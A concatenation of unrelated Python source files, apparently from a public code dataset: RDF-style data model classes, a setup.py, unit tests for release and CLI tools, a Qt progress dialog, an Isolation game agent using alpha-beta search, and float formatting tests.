{'type': 'integer', 'description': 'Topic ID of the gallery image.'}
{'type': 'string', 'description': 'If the image has been categorized by our backend then this will contain the section the image belongs in. (funny, cats, adviceanimals, wtf, etc)'}
['http://purl.org/dc/elements/1.1/', 'publisher', 'dc']
{'type': 'string', 'format': 'url', 'description': '[http://purl.org/dc/elements/1.1/,publisher,dc]The base url for the provider'}
{'$ref': '#/definitions/Popularity'}
import rest_service.model.base_model as base_model
from rest_service.model.base_model import Model
create_insert = base_model.create_insert
class Popularity(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'Popularity'},
'comment_count': { 'link': [ 'http://razvanrotari.me/terms/',
'comment_count',
'rr'],
'ref': None,
'type': 'int',
'value': None},
'down_votes': { 'link': [ 'http://razvanrotari.me/terms/',
'down_votes',
'rr'],
'ref': None,
'type': 'int',
'value': None},
'up_votes': { 'link': ['http://razvanrotari.me/terms/', 'up_votes', 'rr'],
'ref': None,
'type': 'int',
'value': None},
'views': { 'link': ['http://razvanrotari.me/terms/', 'views', 'rr'],
'ref': None,
'type': 'int',
'value': None}}
base_model.Popularity = Popularity
class Author(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'Author'},
'description': { 'link': [ 'http://razvanrotari.me/terms/',
'description',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'external_id': { 'link': [ 'http://razvanrotari.me/terms/',
'external_id',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'followers': { 'link': [ 'http://razvanrotari.me/terms/',
'followers',
'rr'],
'ref': None,
'type': 'int',
'value': None},
'location': { 'link': ['http://razvanrotari.me/terms/', 'location', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'name': { 'link': ['http://razvanrotari.me/terms/', 'name', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'popularity': { 'link': [ 'http://razvanrotari.me/terms/',
'popularity',
'rr'],
'ref': 'Popularity',
'type': 'Popularity',
'value': None},
'profile_image_url': { 'link': [ 'http://razvanrotari.me/terms/',
'profile_image_url',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'profile_url': { 'link': [ 'http://razvanrotari.me/terms/',
'profile_url',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'provenance': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'publisher',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'real_name': { 'link': [ 'http://razvanrotari.me/terms/',
'real_name',
'rr'],
'ref': None,
'type': 'str',
'value': None}}
base_model.Author = Author
class User(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'categories': { 'link': ['http://purl.org/media#', 'duration', 'media'],
'ref': None,
'type': 'str',
'value': None},
'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'User'},
'email': { 'link': ['http://xmlns.com/foaf/spec/#', 'term_mbox', 'foaf'],
'ref': None,
'type': 'str',
'value': None},
'name': { 'link': ['http://xmlns.com/foaf/spec/#', 'term_nick', 'foaf'],
'ref': None,
'type': 'str',
'value': None},
'password': { 'link': ['http://razvanrotari.me/terms/', 'password', 'rr'],
'ref': None,
'type': 'str',
'value': None}}
base_model.User = User
class AudioUrl(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'AudioUrl'},
'name': { 'link': ['http://razvanrotari.me/terms/', 'name', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'url': { 'link': ['http://razvanrotari.me/terms/', 'url', 'rr'],
'ref': None,
'type': 'str',
'value': None}}
base_model.AudioUrl = AudioUrl
class AudioItem(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'audio_links': { 'link': [ 'http://razvanrotari.me/terms/',
'audio_links',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'author': { 'link': ['http://purl.org/dc/terms/', 'creator', 'dc'],
'ref': 'Author',
'type': 'Author',
'value': None},
'categories': { 'link': ['http://purl.org/media#', 'duration', 'media'],
'ref': None,
'type': 'str',
'value': None},
'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'AudioItem'},
'description': { 'link': [ 'http://razvanrotari.me/terms/',
'description',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'duration': { 'link': ['http://razvanrotari.me/terms/', 'duration', 'rr'],
'ref': None,
'type': 'float',
'value': None},
'external_category_id': { 'link': [ 'http://razvanrotari.me/terms/',
'external_category_id',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'external_id': { 'link': [ 'http://razvanrotari.me/terms/',
'external_id',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'id': { 'link': ['http://razvanrotari.me/terms/', 'id', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'provenance': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'publisher',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'provider': { 'link': [ 'http://purl.org/dc/terms/',
'accrualPeriodicity',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'recorded_at': { 'link': [ 'http://razvanrotari.me/terms/',
'recorded_at',
'rr'],
'ref': None,
'type': 'datetime',
'value': None},
'supports_comments': { 'link': [ 'http://razvanrotari.me/terms/',
'supports_comments',
'rr'],
'ref': None,
'type': 'bool',
'value': None},
'tags': { 'link': ['http://razvanrotari.me/terms/', 'tags', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'title': { 'link': ['http://razvanrotari.me/terms/', 'title', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'uploaded_at': { 'link': [ 'http://razvanrotari.me/terms/',
'uploaded_at',
'rr'],
'ref': None,
'type': 'datetime',
'value': None}}
base_model.AudioItem = AudioItem
class NewsItem(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'author': { 'link': ['http://purl.org/dc/terms/', 'creator', 'dc'],
'ref': 'Author',
'type': 'Author',
'value': None},
'categories': { 'link': ['http://purl.org/media#', 'duration', 'media'],
'ref': None,
'type': 'str',
'value': None},
'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'NewsItem'},
'description': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'description',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'id': { 'link': ['http://razvanrotari.me/terms/', 'id', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'image_url': { 'link': [ 'http://razvanrotari.me/terms/',
'image_url',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'provenance': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'publisher',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'timestamp': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'created',
'dc'],
'ref': None,
'type': 'datetime',
'value': None},
'title': { 'link': ['http://purl.org/dc/elements/1.1/', 'title', 'dc'],
'ref': None,
'type': 'str',
'value': None},
'url': { 'link': ['http://razvanrotari.me/terms/', 'url', 'rr'],
'ref': None,
'type': 'str',
'value': None}}
base_model.NewsItem = NewsItem
class ImageItem(Model):
def __init__(self, URI):
self.URI = URI
self.data = { 'animated': { 'link': ['http://razvanrotari.me/terms/', 'animated', 'rr'],
'ref': None,
'type': 'bool',
'value': None},
'author': { 'link': ['http://purl.org/dc/terms/', 'creator', 'dc'],
'ref': 'Author',
'type': 'Author',
'value': None},
'categories': { 'link': ['http://purl.org/media#', 'duration', 'media'],
'ref': None,
'type': 'str',
'value': None},
'class_name': { 'link': [ 'http://razvanrotari.me/terms/',
'className',
'rr'],
'value': 'ImageItem'},
'description': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'description',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'external_id': { 'link': [ 'http://razvanrotari.me/terms/',
'external_id',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'external_topic_id': { 'link': [ 'http://razvanrotari.me/terms/',
'external_topic_id',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'gifv': { 'link': ['http://razvanrotari.me/terms/', 'gifv', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'height': { 'link': ['http://razvanrotari.me/terms/', 'height', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'id': { 'link': ['http://razvanrotari.me/terms/', 'id', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'link': { 'link': ['http://razvanrotari.me/terms/', 'link', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'mime_type': { 'link': [ 'http://razvanrotari.me/terms/',
'mime_type',
'rr'],
'ref': None,
'type': 'str',
'value': None},
'mp4': { 'link': ['http://razvanrotari.me/terms/', 'mp4', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'mp4_size': { 'link': ['http://razvanrotari.me/terms/', 'mp4_size', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'nsfw': { 'link': ['http://razvanrotari.me/terms/', 'nsfw', 'rr'],
'ref': None,
'type': 'bool',
'value': None},
'popularity': { 'link': [ 'http://razvanrotari.me/terms/',
'popularity',
'rr'],
'ref': 'Popularity',
'type': 'Popularity',
'value': None},
'provenance': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'publisher',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'section': { 'link': ['http://razvanrotari.me/terms/', 'section', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'size': { 'link': ['http://razvanrotari.me/terms/', 'size', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'timestamp': { 'link': [ 'http://purl.org/dc/elements/1.1/',
'created',
'dc'],
'ref': None,
'type': 'str',
'value': None},
'title': { 'link': ['http://purl.org/dc/elements/1.1/', 'title', 'dc'],
'ref': None,
'type': 'str',
'value': None},
'topic': { 'link': ['http://razvanrotari.me/terms/', 'topic', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'views': { 'link': ['http://razvanrotari.me/terms/', 'views', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'vote': { 'link': ['http://razvanrotari.me/terms/', 'vote', 'rr'],
'ref': None,
'type': 'str',
'value': None},
'width': { 'link': ['http://razvanrotari.me/terms/', 'width', 'rr'],
'ref': None,
'type': 'str',
'value': None}}
base_model.ImageItem = ImageItem
| StarcoderdataPython |
306685 | <filename>setup.py
# pylint: disable=missing-docstring
# Copyright (c) 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from setuptools import setup, find_packages
setup(
name='demiurge',
version='0.8.3',
packages=find_packages(),
install_requires=[
'awacs==0.5.4',
'boto3==1.3.1',
'click==6.6',
'connexion==1.0.103',
'fauxfactory==2.0.9',
'Flask-HTTPAuth',
'troposphere==1.6.0',
'pyopenssl',
'cffi==1.7.0'
],
author='<NAME>',
author_email='<EMAIL>',
license='Apache License, Version 2.0',
entry_points={
'console_scripts': [
'demiurge = demiurge.cli:cli',
],
},
)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 colorcolumn=100
| StarcoderdataPython |
9608223 | <filename>gslab_scons/tests/test_release_tools.py
import unittest
import sys
import os
import mock
# Import module containing gslab_scons testing side effects
import gslab_scons.tests._side_effects as fx
# Ensure that Python can find and load the GSLab libraries
os.chdir(os.path.dirname(os.path.realpath(__file__)))
sys.path.append('../..')
import gslab_scons
import gslab_scons._release_tools as tools
from gslab_scons._exception_classes import ReleaseError
from gslab_make.tests import nostderrout
class TestReleaseTools(unittest.TestCase):
@mock.patch('gslab_scons._release_tools.requests.session')
@mock.patch('gslab_scons._release_tools.open')
@mock.patch('gslab_scons._release_tools.os.path.isfile')
def test_upload_asset_standard(self, mock_isfile, mock_open, mock_session):
'''
Test that upload_asset() correctly prepares a request
to upload a release asset to GitHub.
'''
# Allow upload_asset() to work without an actual release asset file
mock_isfile.return_value = True
mock_open.return_value = 'file_object'
# There are three connected requests-related mocks at play here:
# i) mock_session: the requests.session() function
# ii) the session object returned by requests.session
# iii) the mocked post() method of the mocked session object
mock_session.return_value = mock.MagicMock(post = mock.MagicMock())
tools.upload_asset(github_token = '<PASSWORD>',
org = 'gslab-econ',
repo = 'gslab_python',
release_id = 'test_release',
file_name = 'release.txt',
content_type = 'text/markdown')
# Check that upload_asset called a session object's post() method
# once and with the correct arguments.
mock_session.return_value.post.assert_called_once()
keyword_args = mock_session.return_value.post.call_args[1]
positional_args = mock_session.return_value.post.call_args[0]
self.assertEqual(keyword_args['files']['file'], 'file_object')
self.assertEqual(keyword_args['headers']['Authorization'], 'token test_token')
self.assertEqual(keyword_args['headers']['Content-Type'], 'text/markdown')
# Check that the first positional argument matches the desired upload path
desired_upload_path = ''.join(['https://uploads.github.com/repos/',
'gslab-econ/gslab_python/releases/',
'test_release/assets?name=release.txt'])
self.assertEqual(positional_args[0], desired_upload_path)
@mock.patch('gslab_scons._release_tools.requests.session')
def test_upload_asset_bad_file(self, mock_session):
'''
Test that upload_asset() raises an error when its file_name
argument isn't valid.
'''
mock_session.return_value = mock.MagicMock(post = mock.MagicMock())
with self.assertRaises(ReleaseError), nostderrout():
tools.upload_asset(github_token = '<PASSWORD>',
org = 'gslab-econ',
repo = 'gslab_python',
release_id = 'test_release',
file_name = 'nonexistent_file',
content_type = 'text/markdown')
@mock.patch('gslab_scons._release_tools.subprocess.call')
def test_up_to_date(self, mock_call):
'''
Test that up_to_date() correctly recognises
an SCons directory as up-to-date or out of date.
'''
# The mode argument needs to be one of the valid options
with self.assertRaises(ReleaseError), nostderrout():
gslab_scons._release_tools.up_to_date(mode = 'invalid')
# The mock of subprocess call should write pre-specified text
# to stdout. This mock prevents us from having to set up real
# SCons and git directories.
mock_call.side_effect = \
fx.make_call_side_effect('Your branch is up-to-date')
self.assertTrue(gslab_scons._release_tools.up_to_date(mode = 'git'))
mock_call.side_effect = \
fx.make_call_side_effect('modified: .sconsign.dblite')
self.assertFalse(gslab_scons._release_tools.up_to_date(mode = 'git'))
mock_call.side_effect = \
fx.make_call_side_effect("scons: `.' is up to date.")
self.assertTrue(gslab_scons._release_tools.up_to_date(mode = 'scons'))
mock_call.side_effect = \
fx.make_call_side_effect('python some_script.py')
self.assertFalse(gslab_scons._release_tools.up_to_date(mode = 'scons'))
# The up_to_date() function shouldn't work in SCons or git mode
# when it is called outside of a SCons directory or a git
# repository, respectively.
mock_call.side_effect = \
fx.make_call_side_effect("Not a git repository")
with self.assertRaises(ReleaseError), nostderrout():
gslab_scons._release_tools.up_to_date(mode = 'git')
mock_call.side_effect = \
fx.make_call_side_effect("No SConstruct file found")
with self.assertRaises(ReleaseError), nostderrout():
gslab_scons._release_tools.up_to_date(mode = 'scons')
@mock.patch('gslab_scons._release_tools.open')
def test_extract_dot_git(self, mock_open):
'''
Test that extract_dot_git() correctly extracts repository
information from a .git folder's config file.
'''
mock_open.side_effect = fx.dot_git_open_side_effect()
repo_info = tools.extract_dot_git('.git')
self.assertEqual(repo_info[0], 'repo')
self.assertEqual(repo_info[1], 'org')
self.assertEqual(repo_info[2], 'branch')
# Ensure that extract_dot_git() raises an error when the directory
# argument is not a .git folder.
# i) The directory argument identifies an empty folder
with self.assertRaises(ReleaseError):
repo_info = tools.extract_dot_git('not/git')
# ii) Mock the .git/config file so that url information is missing
# from its "[remote "origin"]" section. (We parse organisaton,
# repo, and branch information from this url.)
mock_open.side_effect = fx.dot_git_open_side_effect(url = False)
with self.assertRaises(ReleaseError):
repo_info = tools.extract_dot_git('.git')
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
11209617 | <reponame>roedesh/nxstart
# -*- coding: utf-8 -*-
"""Includes tests for the 'libnx' command"""
import os
from click.testing import CliRunner
from nxstart.cli import cli
from nxstart.tests.helpers import (APP_AUTHOR, APP_NAME, DATE_CREATED,
DIRECTORY_NAME, directory_exists,
file_contains_strings, file_exists,
makefile_has_project_and_author_name,
readme_has_project_and_author_name)
def test_libnx_with_clion():
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(
cli, ["-n", APP_NAME, "-a", APP_AUTHOR, "libnx", "--clion"]
)
assert not result.exception
assert result.output.endswith("Successfully created the libnx project!\n")
assert directory_exists(os.path.join(DIRECTORY_NAME, "data"))
assert directory_exists(os.path.join(DIRECTORY_NAME, "includes"))
assert file_exists("CMakeLists.txt")
assert readme_has_project_and_author_name()
assert makefile_has_project_and_author_name()
assert main_cpp_has_valid_data()
def test_libnx_without_clion():
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(
cli, ["-n", APP_NAME, "-a", APP_AUTHOR, "libnx", "--no-clion"]
)
assert not result.exception
assert result.output.endswith("Successfully created the libnx project!\n")
assert directory_exists(os.path.join(DIRECTORY_NAME, "data"))
assert directory_exists(os.path.join(DIRECTORY_NAME, "includes"))
assert not file_exists("CMakeLists.txt")
assert readme_has_project_and_author_name()
assert makefile_has_project_and_author_name()
assert main_cpp_has_valid_data()
def main_cpp_has_valid_data():
return file_contains_strings(
os.path.join("source", "main.cpp"), [APP_NAME, APP_AUTHOR, DATE_CREATED]
)
| StarcoderdataPython |
11273794 | <filename>h5sh/scripts/__init__.py<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Command line entry points."""
| StarcoderdataPython |
3580217 | <gh_stars>1-10
#------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" A simple progress bar intended to run in the UI thread """
import time
from pyface.qt import QtGui, QtCore
from traits.api import Bool, Instance, Int, Unicode, provides
from pyface.i_progress_dialog import IProgressDialog, MProgressDialog
from .window import Window
@provides(IProgressDialog)
class ProgressDialog(MProgressDialog, Window):
""" A simple progress dialog window which allows itself to be updated
"""
# FIXME: buttons are not set up correctly yet
#: The progress bar widget
progress_bar = Instance(QtGui.QProgressBar)
#: The window title
title = Unicode
#: The text message to display in the dialog
message = Unicode
#: The minimum value of the progress range
min = Int
#: The minimum value of the progress range
max = Int
#: The margin around the progress bar
margin = Int(5)
#: Whether or not the progress dialog can be cancelled
can_cancel = Bool(False)
# The IProgressDialog interface doesn't declare this, but since this is a
# feature of the QT backend ProgressDialog that doesn't appear in WX, we
# offer an option to disable it.
can_ok = Bool(False)
#: Whether or not to show the time taken (not implemented in Qt)
show_time = Bool(False)
#: Whether or not to show the percent completed
show_percent = Bool(False)
#: The size of the dialog
dialog_size = Instance(QtCore.QRect)
#: Label for the 'cancel' button
cancel_button_label = Unicode('Cancel')
#: Whether or not the dialog was cancelled by the user
_user_cancelled = Bool(False)
#: The widget showing the message text
_message_control = Instance(QtGui.QLabel)
#: The widget showing the time elapsed
_elapsed_control = Instance(QtGui.QLabel)
#: The widget showing the estimated time to completion
_estimated_control = Instance(QtGui.QLabel)
#: The widget showing the estimated time remaining
_remaining_control = Instance(QtGui.QLabel)
#-------------------------------------------------------------------------
# IWindow Interface
#-------------------------------------------------------------------------
def open(self):
""" Opens the window. """
super(ProgressDialog, self).open()
self._start_time = time.time()
def close(self):
""" Closes the window. """
self.progress_bar.destroy()
self.progress_bar = None
super(ProgressDialog, self).close()
#-------------------------------------------------------------------------
# IProgressDialog Interface
#-------------------------------------------------------------------------
def update(self, value):
""" Update the progress bar to the desired value
If the value is >= the maximum and the progress bar is not contained
in another panel the parent window will be closed.
Parameters
----------
value :
The progress value to set.
"""
if self.progress_bar is None:
return None, None
if self.max > 0:
self.progress_bar.setValue(value)
if (self.max != self.min):
percent = (float(value) - self.min)/(self.max - self.min)
else:
percent = 1.0
if self.show_time and (percent != 0):
current_time = time.time()
elapsed = current_time - self._start_time
estimated = elapsed/percent
remaining = estimated - elapsed
self._set_time_label(elapsed, self._elapsed_control)
self._set_time_label(estimated, self._estimated_control)
self._set_time_label(remaining, self._remaining_control)
if value >= self.max or self._user_cancelled:
self.close()
else:
self.progress_bar.setValue(self.progress_bar.value() + value)
if self._user_cancelled:
self.close()
QtGui.QApplication.processEvents()
return (not self._user_cancelled, False)
#-------------------------------------------------------------------------
# Private Interface
#-------------------------------------------------------------------------
def reject(self, event):
self._user_cancelled = True
self.close()
def _set_time_label(self, value, control):
hours = value / 3600
minutes = (value % 3600) / 60
seconds = value % 60
label = "%1u:%02u:%02u" % (hours, minutes, seconds)
control.setText(label)
def _create_buttons(self, dialog, layout):
""" Creates the buttons. """
if not (self.can_cancel or self.can_ok):
return
# Create the button.
buttons = QtGui.QDialogButtonBox()
if self.can_cancel:
buttons.addButton(self.cancel_button_label, QtGui.QDialogButtonBox.RejectRole)
if self.can_ok:
buttons.addButton(QtGui.QDialogButtonBox.Ok)
# TODO: hookup the buttons to our methods, this may involve subclassing from QDialog
if self.can_cancel:
buttons.rejected.connect(dialog.reject)
if self.can_ok:
buttons.accepted.connect(dialog.accept)
layout.addWidget(buttons)
def _create_label(self, dialog, layout, text):
dummy = QtGui.QLabel(text, dialog)
dummy.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
label = QtGui.QLabel("unknown", dialog)
label.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft | QtCore.Qt.AlignRight)
sub_layout = QtGui.QHBoxLayout()
sub_layout.addWidget(dummy)
sub_layout.addWidget(label)
layout.addLayout(sub_layout)
return label
def _create_gauge(self, dialog, layout):
self.progress_bar = QtGui.QProgressBar(dialog)
self.progress_bar.setRange(self.min, self.max)
layout.addWidget(self.progress_bar)
if self.show_percent:
self.progress_bar.setFormat("%p%")
else:
self.progress_bar.setFormat("%v")
def _create_message(self, dialog, layout):
label = QtGui.QLabel(self.message, dialog)
label.setAlignment(QtCore.Qt.AlignTop | QtCore.Qt.AlignLeft)
layout.addWidget(label)
self._message_control = label
return
def _create_percent(self, dialog, parent_sizer):
if not self.show_percent:
return
raise NotImplementedError
def _create_timer(self, dialog, layout):
if not self.show_time:
return
self._elapsed_control = self._create_label(dialog, layout, "Elapsed time : ")
self._estimated_control = self._create_label(dialog, layout, "Estimated time : ")
self._remaining_control = self._create_label(dialog, layout, "Remaining time : ")
def _create_control(self, parent):
return QtGui.QDialog(parent)
def _create(self):
super(ProgressDialog, self)._create()
self._create_contents(self.control)
def _create_contents(self, parent):
dialog = parent
layout = QtGui.QVBoxLayout(dialog)
layout.setContentsMargins(self.margin, self.margin,
self.margin, self.margin)
# The 'guts' of the dialog.
self._create_message(dialog, layout)
self._create_gauge(dialog, layout)
self._create_timer(dialog, layout)
self._create_buttons(dialog, layout)
dialog.setWindowTitle(self.title)
parent.setLayout(layout)
#-------------------------------------------------------------------------
# Trait change handlers
#-------------------------------------------------------------------------
def _max_changed(self, new):
if self.progress_bar is not None:
self.progress_bar.setMaximum(new)
def _min_changed(self, new):
if self.progress_bar is not None:
self.progress_bar.setMinimum(new)
def _message_changed(self, new):
if self._message_control is not None:
self._message_control.setText(new)
| StarcoderdataPython |
3220054 | """
Contains modules related to cleaning and features processing
Modules :
- Categorical_Data
- Date_Data
- Label encoder
- Missing_Values
- Process_Outliers
- Scaling
"""
__all__ = ['Categorical',
'Date',
'Deep_Encoder',
'Missing_Values',
'Outliers']
| StarcoderdataPython |
4934725 | <filename>GamePlaying/my_custom_player.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 8 13:56:52 2020
@author: alysonweidmann
"""
import random
from GamePlaying.sample_players import DataPlayer
_WIDTH = 11
_HEIGHT = 9
_SIZE = (_WIDTH + 2) * _HEIGHT - 2
class CustomPlayer(DataPlayer):
""" Implement your own agent to play knight's Isolation
The get_action() method is the only required method for this project.
You can modify the interface for get_action by adding named parameters
with default values, but the function MUST remain compatible with the
default interface.
**********************************************************************
NOTES:
- The test cases will NOT be run on a machine with GPU access, nor be
suitable for using any other machine learning techniques.
- You can pass state forward to your agent on the next turn by assigning
any pickleable object to the self.context attribute.
**********************************************************************
"""
def get_action(self, state):
""" Employ an adversarial search technique to choose an action
available in the current state calls self.queue.put(ACTION) at least
This method must call self.queue.put(ACTION) at least once, and may
call it as many times as you want; the caller will be responsible
for cutting off the function after the search time limit has expired.
See RandomPlayer and GreedyPlayer in sample_players for more examples.
**********************************************************************
NOTE:
- The caller is responsible for cutting off search, so calling
get_action() from your own code will create an infinite loop!
Refer to (and use!) the Isolation.play() function to run games.
**********************************************************************
"""
# TODO: Replace the example implementation below with your own search
# method by combining techniques from lecture
#
# EXAMPLE: choose a random move without any search--this function MUST
# call self.queue.put(ACTION) at least once before time expires
# (the timer is automatically managed for you)
if state.ply_count < 2:
#If game is just starting, take the center square if available, or next to it if not
#try:
# self.queue.put(self.center2ind(state))
#except:
self.queue.put(random.choice([self.center2ind(state)+1, self.center2ind(state)-1]))
else:
self.queue.put(self.alpha_beta(state,
score_func='defensive',
depth=2))
@property
def score_fn(self):
# store heuristic functions as callables in dictionary
# can vary scoring mechanism in self.alpha_beta()
return {'baseline': self.baseline,
'offensive': self.offensive,
'defensive': self.defensive,
'offensive2defensive': self.offensive2defensive,
'defensive2offensive': self.defensive2offensive,
'favor_center': self.favor_center,
'block_opponent': self.block_opponent,
'heuristic1': self.heuristic1,
'heuristic2': self.heuristic2,
'heuristic3': self.heuristic3,
'heuristic4': self.heuristic4}
def ratio(self, state):
area = len(state.liberties(None))
return state.ply_count / area
def ind2xy(self, ind):
""" Convert from board index value to xy coordinates
"""
return (ind % (_WIDTH + 2), ind // (_WIDTH + 2))
def score(self, state):
#Number own moves available
own_loc = state.locs[self.player_id]
own_liberties = state.liberties(own_loc)
return len(own_liberties)
def opp_score(self, state):
#Number opponent moves available
opp_loc = state.locs[1 - self.player_id]
opp_liberties = state.liberties(opp_loc)
return len(opp_liberties)
def offensive(self, state):
#Minimize opponent's available moves at a weighted cost against own
return self.score(state) - (self.opp_score(state)*2)
def defensive(self, state):
#Maximize own available moves at weighted cost against opponent's
return (self.score(state)*2) - self.opp_score(state)
def defensive2offensive(self, state):
ratio = self.ratio(state)
if ratio <= 0.5:
return self.defensive(state)
else:
return self.offensive(state)
def offensive2defensive(self, state):
ratio = self.ratio(state)
if ratio <= 0.5:
return self.offensive(state)
else:
return self.defensive(state)
def center(self):
return (_WIDTH // 2, _HEIGHT // 2)
def center2ind(self, state):
#Convert center xy position to loc index
center_xy = self.center()
for i in state.actions():
if self.ind2xy(i) == center_xy:
return i
def favor_center(self, state):
# Get index of center square
center_xy = self.center()
#Get player positions relative to center
own_loc = state.locs[self.player_id]
opp_loc = state.locs[1 - self.player_id]
own_xy = self.ind2xy(own_loc)
opp_xy = self.ind2xy(opp_loc)
own_distance = abs(own_xy[1] - center_xy[1]) + abs(own_xy[0] - center_xy[0])
opp_distance = abs(opp_xy[1] - center_xy[1]) + abs(opp_xy[0] - center_xy[0])
#scale to value between -1 and +1, as less important than having more moves than opponent
return float(own_distance - opp_distance)/10
def block_opponent(self, state):
# Find opponent moves that are legal moves for the agent and steal them
own_loc = state.locs[self.player_id]
opp_loc = state.locs[1 - self.player_id]
own_liberties = state.liberties(own_loc)
opp_liberties = state.liberties(opp_loc)
equal_moves = list(set(own_liberties).intersection(opp_liberties))
return self.offensive(state) + len(equal_moves)
def baseline(self, state):
#my_moves heuristic for baseline comparisons
return self.score(state) - self.opp_score(state)
def heuristic1(self, state):
#if players have equal numbers of moves, score to favor the center of the board
#Otherwise, play offensive2defensive
if self.score(state) != self.opp_score(state):
return self.offensive2defensive(state)
else:
return self.favor_center(state)
def heuristic2(self, state):
#if players have equal numbers of moves, score to favor the center of the board
#Otherwise, play offensive2defensive
if self.score(state) != self.opp_score(state):
return self.defensive2offensive(state)
else:
return self.favor_center(state)
def heuristic3(self, state):
#if players have equal numbers of moves, score to favor the center of the board
#Otherwise, play offensive2defensive
if self.score(state) != self.opp_score(state):
return self.offensive(state)
else:
return self.favor_center(state)
def heuristic4(self, state):
#if players have equal numbers of moves, score to favor the center of the board
#Otherwise, play offensive2defensive
if self.score(state) != self.opp_score(state):
return self.defensive(state)
else:
return self.favor_center(state)
def alpha_beta(self, state, score_func, depth):
def min_value(state, alpha, beta, depth):
if state.terminal_test(): return state.utility(self.player_id)
if depth <= 0: return self.score_fn[score_func](state)
value = float("inf")
for action in state.actions():
value = min(value, max_value(state.result(action), alpha, beta, depth - 1))
if value <= alpha:
return value
else:
beta = min(beta, value)
return value
def max_value(state, alpha, beta, depth):
if state.terminal_test(): return state.utility(self.player_id)
if depth <= 0: return self.score_fn[score_func](state)
value = float("-inf")
for action in state.actions():
value = max(value, min_value(state.result(action), alpha, beta, depth - 1))
if value >= beta:
return value
else:
alpha = max(alpha, value)
return value
alpha = float("-inf")
beta = float("+inf")
depth = depth
best_score = float("-inf")
best_move = None
for a in state.actions():
v = min_value(state.result(a), alpha, beta, depth - 1)
alpha = max(alpha, v)
if v >= best_score:
best_score = v
best_move = a
return best_move
| StarcoderdataPython |
11346074 | print("%s" % 1.0)
print("%r" % 1.0)
print("%d" % 1.0)
print("%i" % 1.0)
print("%u" % 1.0)
# these 3 have different behaviour in Python 3.x versions
# uPy raises a TypeError, following Python 3.5 (earlier versions don't)
#print("%x" % 18.0)
#print("%o" % 18.0)
#print("%X" % 18.0)
print("%e" % 1.23456)
print("%E" % 1.23456)
print("%f" % 1.23456)
print("%F" % 1.23456)
print("%g" % 1.23456)
print("%G" % 1.23456)
print("%06e" % float("inf"))
